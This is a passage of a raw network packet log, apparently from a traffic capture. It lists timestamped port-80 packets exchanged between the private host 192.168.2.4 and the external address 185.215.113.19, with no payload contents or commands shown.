Aug 31, 2024 22:41:57.452852964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.452861071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.452888966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.452908039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.452955961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.452974081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.452995062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453016043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453037024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453053951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453191996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453217983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453239918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453255892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453279018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453298092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453310966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453334093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453351021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453370094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453391075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453408003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453429937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453452110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453465939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453555107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453567028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453589916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453610897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453629017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453685999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453706980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453727961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453772068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453788996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453816891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.453931093 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.453943014 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.453953981 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.453964949 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.453974962 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.453985929 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.454459906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.454488039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.454519987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.454544067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.454687119 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.454699039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.454823971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.454847097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.454943895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.454971075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.454988003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455037117 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455049992 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455060005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455061913 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455073118 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455084085 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455095053 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455105066 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455116034 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455117941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455127954 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455138922 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455148935 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455158949 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455169916 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455180883 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455192089 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455203056 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455213070 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455224037 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455235004 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455245018 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455255985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455266953 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.455465078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455492020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455517054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455539942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455562115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455585957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455605984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455626011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455651045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455677032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455792904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455816031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455909967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455970049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.455996990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.456020117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.456110954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.456131935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.456161976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458133936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458185911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458206892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458255053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458275080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458296061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458314896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458343983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458353043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458375931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458399057 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458415031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458436966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458456993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458471060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458497047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458514929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458539009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458555937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458578110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458599091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458619118 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458625078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458631039 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458632946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.458642006 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458652020 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458662987 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458673000 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458683968 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458693981 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458704948 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458715916 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458725929 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458736897 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458748102 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458760023 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458770990 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458781004 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458791971 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458801985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458811998 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458822966 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458833933 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458843946 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458854914 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458864927 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458877087 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458890915 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458901882 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458913088 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458924055 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458934069 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458945036 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458955050 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458965063 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458976030 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458986044 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.458997011 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459007978 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459017992 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459028006 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459038973 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459049940 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459060907 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459070921 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459748030 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459763050 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459774017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459784985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459795952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459806919 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459817886 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459829092 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459840059 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459851027 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459861040 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459871054 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459882021 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459892988 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459903955 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459913969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.459914923 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459927082 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459937096 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459942102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.459948063 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459959984 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459963083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.459970951 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459981918 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.459991932 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460002899 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460012913 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460021019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460026026 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460038900 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460042953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460048914 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460059881 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460066080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460071087 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460081100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460082054 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460093021 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460100889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460105896 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460117102 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460127115 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460138083 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460149050 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460159063 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460170031 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460180044 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460191011 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460201025 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460211992 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.460338116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460364103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460385084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460402966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460421085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460437059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460458040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460484028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460490942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460510015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460531950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460552931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460563898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460669994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460689068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460716009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.460844040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.463335991 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463351011 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463361979 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463372946 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463383913 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463395119 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463404894 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463414907 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463426113 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463437080 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463447094 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463458061 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463468075 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463479042 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463490009 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463500023 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463510990 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463522911 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463532925 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463543892 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463555098 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463565111 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463574886 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463592052 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463602066 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463613987 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463627100 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463637114 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463648081 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463659048 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463670015 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463680983 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463690996 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463701010 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463711977 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463722944 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463732958 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463743925 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463753939 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463763952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.463774920 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.464405060 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.464416981 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.464427948 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.464438915 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.464449883 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.464459896 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.464471102 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.464991093 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468024015 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468041897 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468054056 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468065023 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468075037 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468086004 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468096018 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468106031 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468116999 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468127966 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468138933 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468148947 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468161106 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.468172073 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.469285011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469315052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469341040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469364882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469389915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469413996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469436884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469460011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469486952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469508886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469533920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469562054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469588041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469615936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469640970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469666004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469688892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469712019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469736099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469760895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469784021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469804049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469831944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469855070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469878912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469907045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469938993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469965935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.469995022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.470021963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.470045090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.470067024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.470092058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.470117092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.470139980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.470164061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.470187902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473084927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473125935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473212957 CEST	49732	80	192.168.2.4	185.215.113.19
